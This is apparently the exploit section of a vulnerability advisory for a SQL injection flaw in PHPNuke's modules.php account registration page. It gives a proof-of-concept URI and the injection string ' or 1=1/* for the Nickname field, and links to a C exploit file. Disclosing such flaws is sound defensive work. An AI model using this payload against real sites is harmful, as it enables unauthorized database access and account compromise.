• info
• discussion
• exploit
• solution
• references

PHPNuke Modules.PHP SQL Injection Vulnerability


No exploit is required.

The following proof of concept URI is available:
http://www.example.com/[phpnuke_dir]/modules.php?name=Your_Account&op=new_user
And fill in all Fields but in Nickname: field enter : ' or 1=1/*


The following proof of concept exploit is also available:

• http://www.securityfocus.com/vulnerabilities/exploits/phpnuke-sp3x.c